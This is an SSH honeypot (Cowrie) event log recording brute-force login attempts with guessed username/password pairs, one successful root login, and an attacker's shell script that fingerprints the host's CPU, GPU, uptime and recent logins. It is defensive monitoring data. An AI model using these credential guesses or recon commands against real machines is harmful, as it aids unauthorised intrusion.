{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"2.0","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:59:27.137694Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.session.closed","duration":"14.9","message":"Connection lost after 14.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:59:27.138953Z","src_ip":"212.227.235.229","session":"40e52c6ae5e6"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54136,"dst_ip":"1.2.3.4","dst_port":22,"session":"eeb3f14c66fa","protocol":"ssh","message":"New connection: 51.79.164.132:54136 (1.2.3.4:22) [session: eeb3f14c66fa]","sensor":"my-vps","timestamp":"2025-08-28T08:59:33.819461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:59:33.934116Z","src_ip":"51.79.164.132","session":"eeb3f14c66fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:59:34.374074Z","src_ip":"51.79.164.132","session":"eeb3f14c66fa"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-28T08:59:35.613629Z","src_ip":"51.79.164.132","session":"eeb3f14c66fa"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:59:37.168459Z","src_ip":"51.79.164.132","session":"eeb3f14c66fa"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":40380,"dst_ip":"1.2.3.4","dst_port":22,"session":"eac5e5411662","protocol":"ssh","message":"New connection: 185.93.89.7:40380 (1.2.3.4:22) [session: eac5e5411662]","sensor":"my-vps","timestamp":"2025-08-28T08:59:45.004674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:59:45.006188Z","src_ip":"185.93.89.7","session":"eac5e5411662"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:59:45.026475Z","src_ip":"185.93.89.7","session":"eac5e5411662"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:59:45.041951Z","src_ip":"212.227.235.229","session":"3b0718b2ae49"}
{"eventid":"cowrie.session.closed","duration":180.21180152893066,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:59:45.046059Z","src_ip":"212.227.235.229","session":"3b0718b2ae49"}
{"eventid":"cowrie.login.failed","username":"index","password":"index123","message":"login attempt [index/index123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:59:45.068236Z","src_ip":"185.93.89.7","session":"eac5e5411662"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:59:46.098572Z","src_ip":"185.93.89.7","session":"eac5e5411662"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":44792,"dst_ip":"1.2.3.4","dst_port":22,"session":"f57bc359c458","protocol":"ssh","message":"New connection: 51.79.164.132:44792 (1.2.3.4:22) [session: f57bc359c458]","sensor":"my-vps","timestamp":"2025-08-28T08:59:59.642216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:59:59.792924Z","src_ip":"51.79.164.132","session":"f57bc359c458"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:00:00.268584Z","src_ip":"51.79.164.132","session":"f57bc359c458"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:00:02.284748Z","src_ip":"51.79.164.132","session":"f57bc359c458"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60023,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba588e5606c1","protocol":"ssh","message":"New connection: 212.227.235.229:60023 (1.2.3.4:22) [session: ba588e5606c1]","sensor":"my-vps","timestamp":"2025-08-28T09:00:02.826124Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:02.969636Z","src_ip":"212.227.235.229","session":"ba588e5606c1"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:04.020195Z","src_ip":"51.79.164.132","session":"f57bc359c458"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":54310,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b18a578bbc8","protocol":"ssh","message":"New connection: 185.93.89.7:54310 (1.2.3.4:22) [session: 3b18a578bbc8]","sensor":"my-vps","timestamp":"2025-08-28T09:00:07.947035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:00:07.948020Z","src_ip":"185.93.89.7","session":"3b18a578bbc8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:00:07.966969Z","src_ip":"185.93.89.7","session":"3b18a578bbc8"}
{"eventid":"cowrie.login.failed","username":"index","password":"index123!","message":"login attempt [index/index123!] failed","sensor":"my-vps","timestamp":"2025-08-28T09:00:08.006397Z","src_ip":"185.93.89.7","session":"3b18a578bbc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38380,"dst_ip":"1.2.3.4","dst_port":22,"session":"1028e83853d3","protocol":"ssh","message":"New connection: 212.227.125.160:38380 (1.2.3.4:22) [session: 1028e83853d3]","sensor":"my-vps","timestamp":"2025-08-28T09:00:08.352723Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58644,"dst_ip":"1.2.3.4","dst_port":22,"session":"971ed3d458b8","protocol":"ssh","message":"New connection: 212.227.235.229:58644 (1.2.3.4:22) [session: 971ed3d458b8]","sensor":"my-vps","timestamp":"2025-08-28T09:00:08.817949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:00:08.933320Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T09:00:08.934545Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:08.960643Z","src_ip":"212.227.235.229","session":"971ed3d458b8"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:09.026463Z","src_ip":"185.93.89.7","session":"3b18a578bbc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58650,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ae20388d7d6","protocol":"ssh","message":"New connection: 212.227.235.229:58650 (1.2.3.4:22) [session: 9ae20388d7d6]","sensor":"my-vps","timestamp":"2025-08-28T09:00:09.098967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:00:09.099836Z","src_ip":"212.227.235.229","session":"9ae20388d7d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:00:09.239723Z","src_ip":"212.227.235.229","session":"9ae20388d7d6"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:09.380876Z","src_ip":"212.227.235.229","session":"9ae20388d7d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:11.199478Z","src_ip":"212.227.125.160","session":"cf4b7b18fc6b"}
{"eventid":"cowrie.session.closed","duration":180.5249559879303,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:11.203551Z","src_ip":"212.227.125.160","session":"cf4b7b18fc6b"}
{"eventid":"cowrie.login.success","username":"root","password":"123abc","message":"login attempt [root/123abc] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:00:17.574229Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:00:19.749086Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.749805Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.750506Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.752061Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.753403Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.754222Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.755008Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.756255Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.756759Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.757250Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.757995Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.758802Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T09:00:19.759179Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T09:00:21.585226Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:21.586165Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
{"eventid":"cowrie.session.closed","duration":"13.2","message":"Connection lost after 13.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:21.587083Z","src_ip":"212.227.125.160","session":"1028e83853d3"}
